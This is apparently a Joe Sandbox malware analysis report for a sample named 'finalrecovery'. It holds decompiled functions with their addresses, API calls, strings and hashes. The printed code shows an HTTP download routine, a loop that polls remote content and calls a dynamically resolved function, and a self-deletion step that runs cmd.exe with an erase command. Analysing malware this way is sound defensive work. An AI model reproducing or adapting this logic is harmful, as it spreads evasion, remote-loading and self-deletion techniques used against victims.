				E10003BE0(_t194, _t200 - 0x118, 0, 0x104);
				if(HttpQueryInfoA(_t197, 0x1d, _t200 - 0x118, _t200 - 0x11c, 0) == 0) {
					L24:
					 *( *((intOrPtr*)(_t154 + 0x34)) +  *(_t154 + 0x28)) = 0;
					return E1000E837(_t154, _t194, _t197);
				}
				_t118 = _t200 - 0x134;
				 *(_t200 - 0x138) = 0;
				 *(_t200 - 0x13c) = 0;
				__imp__CoCreateInstance(_t118, 0, 1, 0x100101a0, _t200 - 0x138);
				if(_t118 >= 0 &&  *(_t200 - 0x138) != 0) {
					 *((intOrPtr*)(_t200 - 0x148)) = 0xf;
					_t160 = _t200 - 0x118;
					 *((intOrPtr*)(_t200 - 0x15c)) = 0;
					 *((intOrPtr*)(_t200 - 0x14c)) = 0;
					_t183 = _t160 + 1;
					 *((char*)(_t200 - 0x15c)) = 0;
					do {
						_t120 =  *_t160;
						_t160 = _t160 + 1;
					} while (_t120 != 0);
					E1000183D(_t200 - 0x15c, _t200 - 0x118, _t160 - _t183);
					 *(_t200 - 4) =  *(_t200 - 4) & 0x00000000;
					_t185 = E10001006(_t200 - 0x15c);
					 *(_t200 - 4) = 1;
					if( *((intOrPtr*)(_t185 + 0x14)) >= 8) {
						_t185 =  *_t185;
					}
					_t124 =  *(_t200 - 0x138);
					_t125 =  *((intOrPtr*)( *_t124 + 0x10))(_t124, _t185, L"text", _t200 - 0x13c);
					_t197 = _t125;
					L10001B8E(_t200 - 0x174);
					 *(_t200 - 4) =  *(_t200 - 4) | 0xffffffff;
					E10001B3F(_t200 - 0x15c);
					if(_t125 >= 0) {
						_t217 =  *(_t200 - 0x13c);
						if( *(_t200 - 0x13c) != 0) {
							_t195 = ( *((intOrPtr*)(_t154 + 0x34)) - _t194) * 7;
							_push(_t195);
							_t132 = E100026B3(_t154, _t185, _t217);
							 *(_t200 - 0x120) =  *(_t200 - 0x120) & 0x00000000;
							 *(_t200 - 0x124) =  *(_t200 - 0x124) & 0x00000000;
							_t197 =  *( *(_t200 - 0x13c));
							_t170 =  *((intOrPtr*)(_t154 + 0x34)) -  *((intOrPtr*)(_t200 - 0x144));
							_push(0);
							_push(_t200 - 0x120);
							 *(_t200 - 0x140) = _t132;
							_push(_t200 - 0x124);
							_push(_t170);
							_push(_t132);
							_push(_t195);
							_t194 =  *((intOrPtr*)(_t200 - 0x144));
							_push( *(_t154 + 0x28) + _t194);
							_push(_t170);
							_push(0);
							_push( *(_t200 - 0x13c));
							if( *((intOrPtr*)( *( *(_t200 - 0x13c)) + 0x10))() >= 0) {
								_t139 =  *(_t200 - 0x120);
								_t190 =  *((intOrPtr*)(_t154 + 0x30));
								_t173 =  *(_t200 - 0x120) + _t194;
								_t219 = _t190 - _t173;
								if(_t190 > _t173) {
									_t197 =  *(_t154 + 0x28);
								} else {
									_t143 = _t173 + 0x3e8;
									_push(_t143);
									 *((intOrPtr*)(_t154 + 0x30)) = _t143;
									_t197 = E100026B3(_t154, _t190, _t219);
									E10001930(_t197,  *((intOrPtr*)(_t154 + 0x30)),  *(_t154 + 0x28), _t194);
									E100026CA( *(_t154 + 0x28));
									_t190 =  *((intOrPtr*)(_t154 + 0x30));
									_t139 =  *(_t200 - 0x120);
									 *(_t154 + 0x28) = _t197;
								}
								E10001930(_t197 + _t194, _t190 - _t194,  *(_t200 - 0x140), _t139);
								 *((intOrPtr*)(_t154 + 0x34)) =  *(_t200 - 0x120) + _t194;
							}
							E100026CA( *(_t200 - 0x140));
							_t137 =  *(_t200 - 0x13c);
							 *((intOrPtr*)( *_t137 + 8))(_t137);
						}
					}
					_t128 =  *(_t200 - 0x138);
					 *((intOrPtr*)( *_t128 + 8))(_t128);
				}
			}

0x100011b7
0x100011c1
0x100011c6
0x100011c8
0x100011cb
0x100011cd
0x100011d3
0x100011d6
0x100011f9
0x100011fc
0x100011d8
0x100011dd
0x100011de
0x100011e6
0x100011e9
0x100011ec
0x100011ef
0x100011f1
0x100011f1
0x10001207
0x1000120d
0x10001213
0x10001227
0x1000122d
0x10001233
0x10001236
0x1000123c
0x10001244
0x1000124a
0x1000124c
0x10001251
0x10001252
0x1000125d
0x10001265
0x1000126d
0x10001272
0x10001278
0x1000127b
0x1000127e
0x1000127e
0x10001284
0x1000129c
0x100012a9
0x100012cc
0x100014b2
0x100014b8
0x100014c6
0x100014c6
0x100012e3
0x100012e9
0x100012f0
0x100012f6
0x100012fe
0x10001313
0x1000131d
0x10001323
0x10001329
0x1000132f
0x10001332
0x10001338
0x10001338
0x1000133a
0x1000133b
0x1000134f
0x10001354
0x10001369
0x1000136b
0x10001373
0x10001375
0x10001375
0x10001377
0x1000138d
0x10001396
0x10001398
0x1000139d
0x100013a7
0x100013ae
0x100013b4
0x100013bb
0x100013c6
0x100013c9
0x100013ca
0x100013d5
0x100013dc
0x100013e4
0x100013ef
0x100013f5
0x100013f7
0x100013fe
0x10001404
0x1000140b
0x1000140c
0x10001410
0x10001411
0x10001419
0x1000141a
0x1000141b
0x1000141d
0x10001423
0x10001425
0x1000142b
0x1000142e
0x10001431
0x10001433
0x1000146d
0x10001435
0x10001435
0x1000143b
0x1000143c
0x10001447
0x1000144f
0x10001457
0x1000145c
0x10001462
0x10001468
0x10001468
0x1000147c
0x1000148b
0x1000148b
0x10001494
0x10001499
0x100014a3
0x100014a3
0x100013bb
0x100014a6
0x100014af
0x100014af

APIs

__EH_prolog3_GS.LIBCMT ref: 100011C1
InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 1000120D
InternetReadFile.WININET(?,?,000003E8,?), ref: 10001227
HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 100012C4
CoCreateInstance.OLE32(?,00000000,00000001,100101A0,00000000), ref: 100012F6

Strings

text, xrefs: 10001384

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
String ID: text
API String ID: 1154000607-999008199
Opcode ID: 83b4de981f524f26fb0bc236ed01d2d2048785d513966a908e868930e1b3b29b
Instruction ID: 092b9cd8b6955c6289bef89550f3b00a82086d79d9069562fba3b4490d44c401
Opcode Fuzzy Hash: 83b4de981f524f26fb0bc236ed01d2d2048785d513966a908e868930e1b3b29b
Instruction Fuzzy Hash: 92914BB19002189FEB65CF24CC85BE977B9EF49350F1141D9E908AB25ADB70AE81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00409480 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 148
sleepthreadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00409480(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, char _a4, intOrPtr _a20, char* _a24) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v16;
				signed int _v20;
				char _v44;
				char _v220;
				char _v248;
				signed int _t32;
				signed int _t33;
				void* _t41;
				signed int _t42;
				char* _t44;
				void* _t47;
				signed int _t56;
				signed int _t57;
				signed int _t60;
				signed int _t61;
				void* _t62;
				signed char* _t65;
				signed int _t70;
				char* _t81;
				void* _t83;
				char _t85;
				signed int _t89;
				void* _t92;
				void* _t96;

				_t83 = __edi;
				_t62 = __ebx;
				_push(0xffffffff);
				_push(0x42ca00);
				_push( *[fs:0x0]);
				_t32 =  *0x43d054; // 0x8e1b5714
				_t33 = _t32 ^ _t89;
				_v20 = _t33;
				_push(_t33);
				 *[fs:0x0] =  &_v16;
				_v8 = 0;
				E00417D97(__ecx, E004187F3(__ecx, __edx, 0));
				_t81 = _a24;
				_t85 = _a4;
				_t92 = _t89 - 0xec + 8;
				_t65 =  >=  ? _t85 :  &_a4;
				if(_a20 != 3) {
					L7:
					_t65 =  >=  ? _t85 :  &_a4;
					if(_a20 == 4) {
						_t56 =  *_t65;
						_t81 = "/chk";
						if(_t56 !=  *_t81) {
							__eflags = _t56 -  *_t81;
							if(_t56 !=  *_t81) {
								L15:
								asm("sbb eax, eax");
								_t57 = _t56 | 0x00000001;
								__eflags = _t57;
							} else {
								_t56 = _t65[1];
								__eflags = _t56 - _t81[1];
								if(_t56 != _t81[1]) {
									goto L15;
								} else {
									_t56 = _t65[2];
									__eflags = _t56 - _t81[2];
									if(_t56 != _t81[2]) {
										goto L15;
									} else {
										_t56 = _t65[3];
										__eflags = _t56 - _t81[3];
										if(__eflags != 0) {
											goto L15;
										} else {
											_t57 = 0;
										}
									}
								}
							}
						} else {
							_t65 =  &(_t65[4]);
							_t57 = 0;
						}
						_t106 = _t57;
						if(_t57 == 0) {
							goto L17;
						}
					}
				} else {
					_t60 =  *_t65 & 0x000000ff;
					if(_t60 != 0x63) {
						L5:
						asm("sbb eax, eax");
						_t61 = _t60 | 0x00000001;
						__eflags = _t61;
					} else {
						_t60 = _t65[1] & 0x000000ff;
						if(_t60 != 0x68) {
							goto L5;
						} else {
							_t60 = _t65[2] & 0x000000ff;
							if(_t60 != 0x6b) {
								goto L5;
							} else {
								_t61 = 0;
							}
						}
					}
					if(_t61 == 0) {
						L17:
						_push(_t65);
						L24();
						_t92 = _t92 - 0xc;
						E0040B4A0( &_v220, _t81, _t106, "test");
						E00417C2D(0);
					} else {
						goto L7;
					}
				}
				CreateThread(0, 0, E004056A0, 0, 0, 0); // executed
				Sleep(0xbb8); // executed
				E00402520( &_v248, "SUB=");
				_t82 =  &_v248;
				_v8 = 1;
				E00405EA0(_t62,  &_a4,  &_v248, _t83);
				_v8 = 0;
				E00402450(_t62,  &_v248); // executed
				_t41 = E00404840(_t62,  &_v248); // executed
				_t86 = _t41; // executed
				_t42 = E00404F20(_t62, _t106); // executed
				_t70 = _t42;
				_t107 = _t41;
				if(_t41 == 0) {
					__eflags = _t70;
					_t82 = "start";
					_t44 =  ==  ? "start" : "r";
				} else {
					_t44 = "n";
				}
				E00402420(0x450db0, _t44);
				E00406AA0(_t62,  &_v44, _t83, _t86, _t107); // executed
				_v8 = 2;
				_t47 = E0040CA60(_t107);
				_t108 = _t47;
				if(_t47 != 0) {
					_t96 = _t92 - 0x18;
					E00402520(_t96, " ");
					E004066A0(_t62, E00402410( &_v44), _t83); // executed
					_t92 = _t96 + 0x18;
				}
				_t93 = _t92 - 0x18;
				_t74 = _t92 - 0x18;
				E0040BB10(_t62, _t93, _t82, _t83,  &_a4); // executed
				E00408D00(_t62, _t83, _t86, _t108); // executed
				E004054C0(_t62, _t108);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				return E00410A80(_t83, _t74, 0, 0xb0);
			}

0x00409480
0x00409480
0x00409483
0x00409485
0x00409490
0x00409497
0x0040949c
0x0040949e
0x004094a2
0x004094a6
0x004094ae
0x004094be
0x004094c3
0x004094c9
0x004094cc
0x004094d2
0x004094d9
0x004094ff
0x00409505
0x0040950c
0x0040950e
0x00409510
0x00409517
0x00409520
0x00409522
0x00409540
0x00409540
0x00409542
0x00409542
0x00409524
0x00409524
0x00409527
0x0040952a
0x00000000
0x0040952c
0x0040952c
0x0040952f
0x00409532
0x00000000
0x00409534
0x00409534
0x00409537
0x0040953a
0x00000000
0x0040953c
0x0040953c
0x0040953c
0x0040953a
0x00409532
0x0040952a
0x00409519
0x00409519
0x0040951c
0x0040951c
0x00409545
0x00409547
0x00000000
0x00000000
0x00409547
0x004094db
0x004094db
0x004094e0
0x004094f6
0x004094f6
0x004094f8
0x004094f8
0x004094e2
0x004094e2
0x004094e8
0x00000000
0x004094ea
0x004094ea
0x004094f0
0x00000000
0x004094f2
0x004094f2
0x004094f2
0x004094f0
0x004094e8
0x004094fd
0x00409549
0x00409549
0x00409550
0x00409555
0x00409563
0x0040956a
0x00000000
0x00000000
0x00000000
0x004094fd
0x0040957e
0x00409589
0x0040959a
0x0040959f
0x004095a5
0x004095ac
0x004095b7
0x004095bb
0x004095c0
0x004095c5
0x004095c7
0x004095cc
0x004095ce
0x004095d0
0x004095d9
0x004095e0
0x004095e5
0x004095d2
0x004095d2
0x004095d2
0x004095ee
0x004095f6
0x004095fe
0x00409602
0x00409607
0x00409609
0x0040960b
0x00409615
0x00409624
0x00409629
0x00409629
0x0040962c
0x00409632
0x00409635
0x0040963a
0x00409642
0x00409647
0x00409648
0x00409649
0x0040964a
0x0040964b
0x0040964c
0x0040964d
0x0040964e
0x0040964f
0x00409660

APIs

Part of subcall function 004187F3: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,004094BA,00000000), ref: 00418806
Part of subcall function 004187F3: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418837

CreateThread.KERNELBASE(00000000,00000000,Function_000056A0,00000000,00000000,00000000), ref: 0040957E
Sleep.KERNELBASE(00000BB8), ref: 00409589

Strings

test, xrefs: 0040955E
/chk, xrefs: 00409510
SUB=, xrefs: 0040958F
start, xrefs: 004095E0

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Time$CreateFileSleepSystemThreadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: /chk$SUB=$start$test
API String ID: 4044491330-2206718722
Opcode ID: 17b86977dee4868f64282bd59f37cb09cef09138b6398163f00412d0550c0e15
Instruction ID: e7fe4e3e96ace5870c1e22a08d548e8e4f62add42403f3a7286c99e267cd2efa
Opcode Fuzzy Hash: 17b86977dee4868f64282bd59f37cb09cef09138b6398163f00412d0550c0e15
Instruction Fuzzy Hash: 9F415B316001486ACB11EB368C127AEBB619F10308F54447BE945B72C3E73DED46C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 004054C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E004054C0(void* __ebx, void* __eflags) {
				void* _v8;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v44;
				char _v68;
				char _v92;
				char _v116;
				char _v140;
				void* _v164;
				char _v172;
				void** _v180;
				void* _v184;
				void** _v188;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t46;
				void* _t50;
				void* _t52;
				void* _t53;
				void* _t54;
				signed int _t66;
				signed int _t71;
				void* _t75;
				signed int _t78;
				char _t79;
				void* _t98;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void** _t107;
				signed int _t109;
				void* _t111;
				signed int _t113;

				_t46 =  *0x43d054; // 0x8e1b5714
				_v20 = _t46 ^ _t109;
				 *[fs:0x0] =  &_v16;
				_t50 = E00405420( &_v164, GetCurrentProcessId()); // executed
				_t103 = _t50;
				_v8 = 0;
				_t52 = E00405250(__ebx,  &_v140, GetCurrentProcessId()); // executed
				_v8 = 1;
				_t53 = E0040C690( &_v116, _t52);
				_v8 = 2;
				_t54 = E0040C800( &_v92, _t53, "\" /f & erase \"");
				_v8 = 3;
				_t98 = E0040C9C0( &_v68, _t54, _t103);
				_v8 = 4;
				E0040C800( &_v44, _t98, "\" & exit");
				_t113 = _t111 - 0x94 + 0x10;
				E00402450(__ebx,  &_v68, _t46 ^ _t109);
				E00402450(__ebx,  &_v92, _t102);
				E00402450(__ebx,  &_v116,  *[fs:0x0]);
				E00402450(__ebx,  &_v140, 0x42c593);
				E00402450(__ebx,  &_v164, 0xffffffff);
				_t91 =  &_v44;
				ShellExecuteA(0, 0, "C:\\Windows\\System32\\cmd.exe", E00402410(_t91), 0, 0); // executed
				E00417C2D(0); // executed
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_push(_t109);
				_push(0xffffffff);
				_push(0x42c5de);
				_push( *[fs:0x0]);
				_push(__ebx);
				_push(_t103);
				_t66 =  *0x43d054; // 0x8e1b5714
				_push(_t66 ^ _t113);
				 *[fs:0x0] =  &_v172;
				_t104 = _t98;
				_t107 = _t91;
				_v180 = _t107;
				_v188 = _t107;
				_v184 = 0;
				 *_t107 = 0;
				_t107[4] = 0;
				_t107[5] = 0xf;
				 *_t107 = 0;
				_v164 = 0;
				_v184 = 1;
				E0040B950(__ebx, _t91, _t104, _t107, _t104);
				_t116 = _t104;
				if(_t104 > 0) {
					_t78 = 0x3e;
					do {
						_t71 = E00417D76(_t91, _t116);
						_t91 = _t107[4];
						_t33 =  &(("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")[_t71 % _t78]); // 0x33323130
						_t79 =  *_t33;
						_t101 = _t107[5];
						_v24 = _t79;
						if(_t91 >= _t101) {
							_push(_v24);
							_v28 = 0;
							_t91 = _t107;
							E0040D1C0(_t79, _t107, _t104, _t107, _t107, _v28);
						} else {
							_t36 =  &(_t91[0]); // 0x1
							_t107[4] = _t36;
							_t75 = _t107;
							if(_t101 >= 0x10) {
								_t75 =  *_t107;
							}
							 *((char*)(_t75 + _t91)) = _t79;
							 *((char*)(_t75 +  &(_t91[0]))) = 0;
						}
						_t78 = 0x3e;
						_t104 = _t104 - 1;
					} while (_t104 != 0);
				}
				 *[fs:0x0] = _v20;
				return _t107;
			}

0x004054d7
0x004054de
0x004054e6
0x004054fa
0x004054ff
0x00405501
0x00405516
0x0040551f
0x00405523
0x0040552f
0x00405536
0x0040553e
0x0040554f
0x00405551
0x00405558
0x0040555d
0x00405563
0x0040556b
0x00405573
0x0040557e
0x00405589
0x00405592
0x004055a4
0x004055ac
0x004055b1
0x004055b2
0x004055b3
0x004055b4
0x004055b5
0x004055b6
0x004055b7
0x004055b8
0x004055b9
0x004055ba
0x004055bb
0x004055bc
0x004055bd
0x004055be
0x004055bf
0x004055c0
0x004055c3
0x004055c5
0x004055d0
0x004055d4
0x004055d6
0x004055d7
0x004055de
0x004055e2
0x004055e8
0x004055ea
0x004055ec
0x004055ef
0x004055f2
0x004055f9
0x004055ff
0x00405606
0x0040560d
0x00405610
0x00405618
0x0040561f
0x00405624
0x00405626
0x00405628
0x00405630
0x00405630
0x00405637
0x0040563c
0x0040563c
0x00405642
0x00405645
0x0040564a
0x00405665
0x00405668
0x00405670
0x00405672
0x0040564c
0x0040564c
0x0040564f
0x00405652
0x00405657
0x00405659
0x00405659
0x0040565b
0x0040565e
0x0040565e
0x00405677
0x0040567c
0x0040567c
0x00405630
0x00405686
0x00405694

APIs

GetCurrentProcessId.KERNEL32(8E1B5714), ref: 004054EC

Part of subcall function 00405420: OpenProcess.KERNEL32(00000410,00000000,?,00450D41,00000000), ref: 0040544B
Part of subcall function 00405420: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,00450D41,00000000), ref: 00405466
Part of subcall function 00405420: FindCloseChangeNotification.KERNELBASE(00000000,?,00450D41,00000000), ref: 0040546D

GetCurrentProcessId.KERNEL32 ref: 00405508

Part of subcall function 00405250: OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 004052B0
Part of subcall function 00405250: K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?,?), ref: 004052CD
Part of subcall function 00405250: K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104,?,?,?,?), ref: 004052EA
Part of subcall function 00405250: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?), ref: 004052F1

ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,00000000,00000000,00000000), ref: 004055A4

Strings

C:\Windows\System32\cmd.exe, xrefs: 0040559B
" & exit, xrefs: 0040554A
" /f & erase ", xrefs: 00405528

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Process$ChangeCloseCurrentFindModuleNameNotificationOpen$BaseEnumExecuteFileModulesShell
String ID: " & exit$" /f & erase "$C:\Windows\System32\cmd.exe
API String ID: 3061982424-3347335610
Opcode ID: cd67c1f1b6020096fdd9f79a0473f9e67b4749dd249a927fcae96b8f206aae88
Instruction ID: 69c0960f0a585069746dcfc94047fdfad96d32df449e093db321c898be794da7
Opcode Fuzzy Hash: cd67c1f1b6020096fdd9f79a0473f9e67b4749dd249a927fcae96b8f206aae88
Instruction Fuzzy Hash: 49219030A00258DBC700FB61CC46BDDB7B4AB14708F60417AA105B31D2EFB82A4ACB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00408D00 Relevance: 7.8, APIs: 6, Instructions: 344
sleepCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00408D00(void* __ebx, void* __edi, long __esi, void* __eflags, char _a4) {
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				char _v44;
				char _v68;
				char _v92;
				char _v420;
				char _v748;
				char _v1076;
				signed char _v1080;
				intOrPtr _v1084;
				signed int _v1088;
				intOrPtr _v1092;
				char _v1116;
				char _v1140;
				char _v1164;
				char _v1188;
				char _v1212;
				signed int _v1236;
				short _v1240;
				intOrPtr _v1244;
				intOrPtr _v1248;
				char _v1260;
				signed int _t105;
				signed int _t106;
				void* _t108;
				void* _t112;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				void* _t130;
				void* _t131;
				signed int _t134;
				void* _t146;
				void* _t147;
				signed int _t149;
				void* _t154;
				void* _t158;
				void* _t159;
				signed int _t161;
				signed int _t165;
				intOrPtr _t168;
				signed int _t176;
				void* _t177;
				signed char _t180;
				char* _t184;
				intOrPtr _t185;
				signed char _t189;
				signed int _t194;
				void* _t201;
				intOrPtr _t248;
				signed int _t266;
				signed int _t293;
				signed int _t297;
				signed int _t298;
				void* _t299;
				void* _t300;
				void* _t306;
				void* _t307;
				signed int _t308;
				void* _t313;

				_t290 = __esi;
				_t287 = __edi;
				_push(0xffffffff);
				_push(0x42c9a7);
				_push( *[fs:0x0]);
				_t300 = _t299 - 0x4dc;
				_t105 =  *0x43d054; // 0x8e1b5714
				_t106 = _t105 ^ _t297;
				_v20 = _t106;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t106);
				 *[fs:0x0] =  &_v16;
				_v8 = 0;
				_t108 = E00405F40(__ebx, __edi); // executed
				_t198 = Sleep;
				_t316 = _t108;
				if(_t108 == 0) {
					L3:
					E00401970(_t198,  &_v748);
					_v8 = 1;
					_t112 = E00402520( &_v1140, E0040B840(E00409300(_t268, _t287, _t290)));
					_v8 = 2;
					_t115 = E00402520( &_v1116, E0040B870(E00409270(_t198, _t268, _t112, _t290)));
					_v8 = 3;
					L37();
					_t117 = E00402520( &_v1260, E0040B720(_t115));
					_v8 = 4;
					_t118 = E0040C8B0( &_v1236, 0x450de0, _t117);
					_v8 = 5;
					_t119 = E0040C910( &_v1212, _t118,  &_a4);
					_v8 = 6;
					_t120 = E0040C9C0( &_v1188, _t119, _t115);
					_v8 = 7;
					_t121 = E0040C9C0( &_v1164, _t120, _t112);
					_v8 = 8;
					E0040C910( &_v92, _t121, 0x450dc8);
					_t306 = _t300 - 0x14 + 0x14;
					E00402450(_t198,  &_v1164);
					E00402450(_t198,  &_v1188);
					E00402450(_t198,  &_v1212);
					E00402450(_t198,  &_v1236);
					E00402450(_t198,  &_v1260);
					E00402450(_t198,  &_v1116);
					_v8 = 0x10;
					E00402450(_t198,  &_v1140);
					_t292 = 0;
					_t289 = 0xc8;
					while(1) {
						_t292 =  &(1[_t292]);
						_t130 = E00402410( &_v92);
						_t223 =  &_v748;
						_t131 = E00402310(_t198,  &_v748, _t289, _t130); // executed
						if(_t131 == 0) {
							goto L8;
						}
						E00402520( &_v44, E00402380( &_v748));
						_t277 = "0";
						if(E00402810( &_v44, "0") != 0) {
							L11:
							E00402450(_t198,  &_v44);
							E0040BAF0( &_v68);
							_t307 = _t306 - 0x14;
							_v8 = 0x11;
							E00401970(_t198,  &_v1076);
							_v8 = 0x12;
							while(1) {
								_t146 = E00402520( &_v1116, E0040B7F0(E00409390(_t198, _t277, _t289, _t292)));
								_t277 = 0x450df8;
								_v8 = 0x15;
								_t147 = E0040C8B0( &_v1140, 0x450df8, _t146);
								_t307 = _t307 + 4;
								_v8 = 0x16;
								_t149 = E00402310(_t198,  &_v1076, _t289, E00402410(_t147)); // executed
								_t292 = _t149;
								E00402450(_t198,  &_v1140);
								_v8 = 0x12;
								E00402450(_t198,  &_v1116);
								__eflags = _t149;
								if(_t149 == 0) {
									goto L15;
								}
								E00402420( &_v68, E00402380( &_v1076));
								_t154 = E00402400( &_v68);
								__eflags = _t154 - 0xa;
								if(_t154 <= 0xa) {
									goto L15;
								}
								__eflags = _t154 - 0x64;
								if(_t154 < 0x64) {
									_t308 = _t307 - 0x14;
									_t293 = 0;
									__eflags = 0;
									E00401970(_t198,  &_v420);
									_v8 = 0x17;
									do {
										_v1092 = _t293 + 1;
										_t158 = E00402520( &_v1116, E0040B820(E00409420()));
										_t278 = 0x450df8;
										_v8 = 0x1a;
										_t159 = E0040C8B0( &_v1140, 0x450df8, _t158);
										_t308 = _t308 + 4;
										_v8 = 0x1b;
										_t161 = E00402310(_t198,  &_v420, _t289, E00402410(_t159)); // executed
										E00402450(_t198,  &_v1140);
										_v8 = 0x17;
										E00402450(_t198,  &_v1116);
										__eflags = _t161;
										if(_t161 == 0) {
											goto L20;
										}
										_t198 = E00402390( &_v420);
										__eflags = _t198 - 0x16;
										if(__eflags <= 0) {
											goto L20;
										}
										_push( ~(0 | __eflags > 0x00000000) |  &(1[_t198]));
										_t176 = E0041626E();
										_t77 =  &(1[_t198]); // 0x1
										_t289 = _t176;
										_t177 = E00402350( &_v420, _t176, _t77);
										_push( ~(0 | __eflags > 0x00000000) | _t198 * 0x00000002); // executed
										_t180 = E0041626E(); // executed
										_t313 = _t308 + 4 - 0x14;
										_v1080 = _t180;
										E0040BB10(_t198, _t313, _t198 * 2 >> 0x20, _t176,  &_v68);
										_t184 = E00403770(_t198, _t176, _t177, _t289,  &_v1080); // executed
										_t278 = _t184;
										_t185 = E00402B70(_v1080, _t184, __eflags,  &_v1088,  &_v1088); // executed
										_t308 = _t313 + 0x24;
										_v1084 = _t185;
										__eflags = _v1088;
										if(_v1088 != 0) {
											_t289 = Sleep;
											_t293 = 0;
											_v1080 = 0;
											_t198 = 0;
											__eflags = 0;
											do {
												_t266 = _v1084(E00402410(0x450e10), E00402410(0x450d98));
												_t308 = _t308 + 8;
												_t189 = _v1080;
												_t278 = 1;
												__eflags = _t189;
												if(_t189 != 0) {
													__eflags = _t266;
													_t198 =  ==  ? 1 : _t198 & 0x000000ff;
												}
												__eflags = _t293 - 0xa;
												if(_t293 >= 0xa) {
													__eflags = _t266 - 1;
													_t198 =  !=  ? _t278 : _t198 & 0x000000ff;
												}
												__eflags = _t293 - 0xf;
												if(_t293 < 0xf) {
													__eflags = _t293 - 5;
													if(_t293 < 5) {
														goto L33;
													}
													goto L31;
												} else {
													__eflags = _t266 - 1;
													if(_t266 == 1) {
														_t198 = _t266;
													}
													L31:
													__eflags = _t189;
													if(_t189 != 0) {
														goto L33;
													}
													__eflags = _t266 - 0xfffffffe;
													if(__eflags == 0) {
														Sleep(0x7d0); // executed
														L36:
														E004054C0(_t198, __eflags); // executed
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														_push(_t297);
														_t298 = _t308;
														_t165 =  *0x43d054; // 0x8e1b5714
														_v1236 = _t165 ^ _t298;
														_v1248 = 0x5e005d5b;
														_v1244 = 0x5d115e46;
														_v1240 = 0x2e13;
														_t248 =  *((intOrPtr*)( *[fs:0x2c]));
														_t168 =  *0x450e84; // 0x80000017
														__eflags = _t168 -  *((intOrPtr*)(_t248 + 4));
														if(_t168 >  *((intOrPtr*)(_t248 + 4))) {
															E0040EEC8(_t168, 0x450e84);
															__eflags =  *0x450e84 - 0xffffffff;
															if(__eflags == 0) {
																asm("movaps xmm0, [0x439d40]");
																asm("movups [0x450e60], xmm0");
																asm("movq xmm0, [ebp-0x10]");
																asm("movq [0x450e70], xmm0");
																 *0x450e78 = _v16;
																E0040F1DA(_t248, __eflags, 0x42d400);
																E0040EE7E(0x450e84);
															}
														}
														__eflags = _v12 ^ _t298;
														return E0040EB3F(0x450e60, _t198, _v12 ^ _t298, _t278, _t289, _t293);
													}
												}
												L33:
												__eflags = _t266 - 1;
												_t191 =  ==  ? _t278 : _t189 & 0x000000ff;
												_t293 = _t293 + 1;
												_v1080 =  ==  ? _t278 : _t189 & 0x000000ff;
												Sleep(0x7d0); // executed
												__eflags = _t198;
											} while (__eflags == 0);
											goto L36;
										}
										L20:
										_t293 = _v1092;
										__eflags = _t293 - 0xa;
									} while (__eflags < 0);
									goto L36;
								}
								L15:
								Sleep(0xbb8);
							}
						}
						_t277 = "1";
						if(E00402810( &_v44, "1") != 0) {
							goto L11;
						}
						_t223 =  &_v44;
						E00402450(_t198,  &_v44);
						L8:
						_t322 = _t292 - 0x12c;
